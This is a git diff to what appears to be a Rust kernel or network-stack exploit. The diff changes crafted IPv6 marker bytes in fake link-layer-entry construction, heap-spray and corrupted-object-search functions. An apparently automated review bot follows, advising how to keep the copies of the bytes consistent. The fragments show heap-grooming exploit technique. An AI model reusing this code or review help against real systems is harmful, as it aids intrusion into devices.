diff --git a/src/constants.rs b/src/constants.rs
index 18c4599..a00c4fa 100644
--- a/src/constants.rs
+++ b/src/constants.rs
@@ -83,5 +83,5 @@ pub const VM_PROT_ALL: u64 = VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE;
 pub const SOURCE_MAC: [u8; 6] = [0x41; 6];
 pub const SOURCE_IPV6: [u8; 16] = [
- 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+ 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x9f, 0x41, 0xff, 0x9f, 0x9f, 0x41, 0xff,
 ];
diff --git a/src/exploit/exploit.rs b/src/exploit/exploit.rs
index af3767a..0cb361c 100644
--- a/src/exploit/exploit.rs
+++ b/src/exploit/exploit.rs
@@ -384,7 +384,7 @@ pub fn build_fake_lle(
 fake_lle.extend(&0u32.to_le_bytes()); // sin6_flowinfo
 let sin6_addr = 0xfe80000100000000u64.to_be_bytes();
 fake_lle.extend(&sin6_addr);
- let sin6_addr_2 = 0x4141414141414141u64.to_be_bytes();
+ let sin6_addr_2 = 0x9f9f41ff9f9f41ffu64.to_be_bytes();
 fake_lle.extend(&sin6_addr_2);
 fake_lle.extend(&0u32.to_le_bytes()); // sin6_scope_id
diff --git a/src/exploit/utils.rs b/src/exploit/utils.rs
index 48f351e..88a24fb 100644
--- a/src/exploit/utils.rs
+++ b/src/exploit/utils.rs
@@ -96,7 +96,7 @@ pub fn search_for_corrupted_obj(
 if i >= constants::HOLE_START && i % constants::HOLE_SPACE == 0 {
 continue;
 }
- let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i);
+ let source_v6_string = format!("fe80::{:04x}:41ff:9f9f:41ff", i);
 let source_v6: [u8; 16] = std::net::Ipv6Addr::from_str(&source_v6_string)
 .expect("Failed to parse IPv6 address")
 .octets();
@@ -134,7 +134,7 @@ pub fn spray(
 print!("\r[+] Heap Grooming at {}%", progress);
 io::stdout().flush().unwrap();
- let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i);
+ let source_v6_string = format!("fe80::{:04x}:41ff:9f9f:41ff", i);
 let source_v6: [u8; 16] = std::net::Ipv6Addr::from_str(&source_v6_string)
 .expect("Failed to parse IPv6 address")
 .octets();
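Review bot: The new interface-identifier bytes are written out by hand four times in three notations: the `SOURCE_IPV6` array in src/constants.rs, the literal `0x9f9f41ff9f9f41ffu64` in `build_fake_lle`, and the format string `"fe80::{:04x}:41ff:9f9f:41ff"` in both `search_for_corrupted_obj` and `spray`. With the old all-`0x41` value a transposed byte was invisible, but the new value is not uniform, so one mistyped copy now silently breaks the agreement between them and nothing in the code checks it. The commit also gives no reason for the new value, so at minimum each copy deserves a comment such as `// low 64 bits must match constants::SOURCE_IPV6[8..]; group 4 of the spray addresses is replaced by the index i`. Deriving the copies from the one constant would be the sturdier form, but all three functions begin and end outside their hunks, so whether `constants` is in scope in src/exploit/exploit.rs cannot be confirmed from here.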